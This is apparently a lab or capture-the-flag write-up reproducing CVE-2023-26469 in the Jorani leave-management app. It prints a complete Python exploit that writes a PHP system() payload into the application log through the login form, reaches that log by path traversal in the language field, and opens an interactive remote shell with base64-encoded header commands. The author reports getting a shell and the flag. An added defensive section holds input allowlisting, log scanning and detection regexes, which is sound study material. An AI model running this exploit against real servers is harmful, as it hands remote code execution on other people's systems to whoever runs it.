Jorani remote command execution vulnerability CVE-2023-26469: lab reproduction

Lab interface

The exploit script:
""" vulnerability covered by CVE-2023-26469 """ import readline import requests import datetime import sys import re import base64 import random import string requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) msg = lambda x,y="\n":print(f'\x1b[92m[+]\x1b[0m {x}', end=y) err = lambda x,y="\n":print(f'\x1b[91m[x]\x1b[0m {x}', end=y) log = lambda x,y="\n":print(f'\x1b[93m[?]\x1b[0m {x}', end=y) CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"') CMD_PATTERN = re.compile('---------(.*?)---------', re.S) URLS = { 'login' : '/session/login', 'view' : '/pages/view/', } alphabet = string.ascii_uppercase HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12)) BypassRedirect = { 'X-REQUESTED-WITH' : 'XMLHttpRequest', HEADER_NAME : "" } INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term u = lambda x,y: x + URLS[y] POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>" PATH_TRAV_PAYLOAD = "../../application/logs" if __name__ == '__main__': print(""" /!\\ Do not use this if you are not authorized to /!\\ """) log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n") if(len(sys.argv) == 1): err(f"Usage: {sys.argv[0]} <url>") exit(0) log(f"Header used for exploit: {HEADER_NAME}") t = sys.argv[1] s = requests.Session() log("Requesting session cookie") res = s.get(u(t,"login"), verify = False) C = s.cookies.get_dict() Date = datetime.date.today() log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}" csrf_token = re.findall(CSRF_PATTERN, res.text)[0] log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'") log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'") msg(f"Recoveredd CSRF Token: {csrf_token}") data = { "csrf_test_jorani" : csrf_token, "last_page" : "session/login", "language" : PATH_TRAV_PAYLOAD, "login" : 
POISON_PAYLOAD, "CipheredValue" : "DummyPassword" } s.post(u(t,"login"), data=data) log(f"Accessing log file: {log_file_name}") exp_page = t + URLS['view'] + log_file_name ### Shell cmd = "" while True: cmd = input(INPUT) if(cmd in ['x', 'exit', 'quit']): break elif(cmd == ""): continue else: BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;") res = s.get(exp_page, headers=BypassRedirect) cmdRes = re.findall(CMD_PATTERN, res.text) try: print(cmdRes[0]) except: print(res.text) err("Wow, there was a problem, are you sure of the URL ??") err('exiting..') exit(0)
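As an added example (not code from the original post, the PoC author, or the Jorani project), the following Python shows the defender's side of the chain the script above exercises: an exact allowlist check for the language field instead of letting it reach the filesystem as a path fragment, a scan of a log file for injected PHP tags, and a request filter that flags the request shapes the PoC sends (a traversal string in language, a PHP tag in the login field, and a base64 value in a random all-uppercase header on a GET to the day's log through /pages/view/). The allowlist contents, the sample log lines and the sample requests are assumptions constructed for the example; Jorani's real log format and language list are not shown on the page.

```python
"""
Defender-side checks for the CVE-2023-26469 attack chain: a path-traversal
'language' value, a PHP payload written into the daily log via the login
field, and commands delivered in a random uppercase header when the log is
rendered through /pages/view/. Added example, not the post's or Jorani's code.
"""
import base64
import re
from datetime import date

# Assumption: the real set of language codes a Jorani install accepts is not on
# the page; the point is that 'language' must be an exact allowlist match.
ALLOWED_LANGUAGES = {"en", "fr", "de", "es", "zh"}

TRAVERSAL_RE = re.compile(r"\.\.[/\\]|%2e%2e", re.I)            # ../ ..\ and URL-encoded forms
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)                      # <?php or <?= anywhere in a value
DANGEROUS_CALL_RE = re.compile(r"\b(system|exec|shell_exec|passthru|eval|base64_decode)\s*\(", re.I)
LOG_VIEW_RE = re.compile(r"^/pages/view/log-\d{4}-\d{2}-\d{2}$")  # the log name the PoC computes
ODD_HEADER_RE = re.compile(r"^[A-Z]{8,}$")                        # PoC uses 12 random uppercase letters
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")                # base64-looking header value


def validate_language(value):
    """Return the code if it is an exact allowlist entry, else None (reject)."""
    if not isinstance(value, str) or "\x00" in value:
        return None
    if TRAVERSAL_RE.search(value) or "/" in value or "\\" in value:
        return None
    return value if value in ALLOWED_LANGUAGES else None


def log_name_for(year, month, day):
    """Log file name in the layout the PoC targets (log-YYYY-MM-DD)."""
    return f"log-{year}-{month:02d}-{day:02d}"


def todays_log_name():
    d = date.today()
    return log_name_for(d.year, d.month, d.day)


def scan_log_for_poison(log_text):
    """Return (line_no, reason) for each log line that carries injected PHP."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if PHP_TAG_RE.search(line):
            hits.append((n, "php-tag"))
        elif DANGEROUS_CALL_RE.search(line):
            hits.append((n, "dangerous-call"))
    return hits


def suspicious_request(method, path, params, headers):
    """Flag the request shapes the PoC produces; returns a list of reasons."""
    reasons = []
    lang = params.get("language")
    if lang is not None and validate_language(lang) is None:
        reasons.append("language-not-allowlisted")
    for key, val in params.items():
        if PHP_TAG_RE.search(str(val)):
            reasons.append(f"php-tag-in-{key}")
    if method.upper() == "GET" and LOG_VIEW_RE.match(path):
        reasons.append("log-file-via-view-endpoint")
    for name, val in headers.items():
        if ODD_HEADER_RE.match(name) and B64_RE.match(val):
            reasons.append(f"base64-in-unknown-header-{name}")
    return reasons


# Constructed samples (not captured traffic, and not Jorani's real log format).
SAMPLE_LOG = (
    "ERROR - 2023-03-01 10:00:00 --> Failed login attempt for user: admin\n"
    "ERROR - 2023-03-01 10:00:05 --> Failed login attempt for user: "
    "<?php if(isset($_SERVER['HTTP_ABCDEFGHIJKL'])){system(base64_decode($_SERVER['HTTP_ABCDEFGHIJKL']));} ?>\n"
    "INFO - 2023-03-01 10:00:09 --> Language set to en\n"
)

SAMPLE_POISON_POST = {
    "method": "POST",
    "path": "/session/login",
    "params": {
        "csrf_test_jorani": "constructed-token",
        "last_page": "session/login",
        "language": "../../application/logs",
        "login": "<?php system($_GET['c']); ?>",
        "CipheredValue": "DummyPassword",
    },
    "headers": {},
}

SAMPLE_SHELL_GET = {
    "method": "GET",
    "path": "/pages/view/" + log_name_for(2023, 3, 1),
    "params": {},
    "headers": {
        "X-REQUESTED-WITH": "XMLHttpRequest",
        "ABCDEFGHIJKL": base64.b64encode(b"echo ---------;id 2>&1;echo ---------;").decode(),
    },
}

if __name__ == "__main__":
    print("language check:", validate_language("en"), validate_language("../../application/logs"))
    print("poisoned lines:", scan_log_for_poison(SAMPLE_LOG))
    print("login POST:", suspicious_request(**SAMPLE_POISON_POST))
    print("shell GET:", suspicious_request(**SAMPLE_SHELL_GET))
```

The two request samples reproduce the field names and the header convention the PoC uses, so the filter can be checked against exactly what the script sends; in a real deployment the allowlist in validate_language would be filled from the languages actually installed rather than the constructed set here.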
The Windows environment does not seem to support this library, so I switched to a Linux environment.

Successfully got a shell, with ordinary user privileges.

Using the command find / -name flag, I located /flag.
MU5735 R.I.P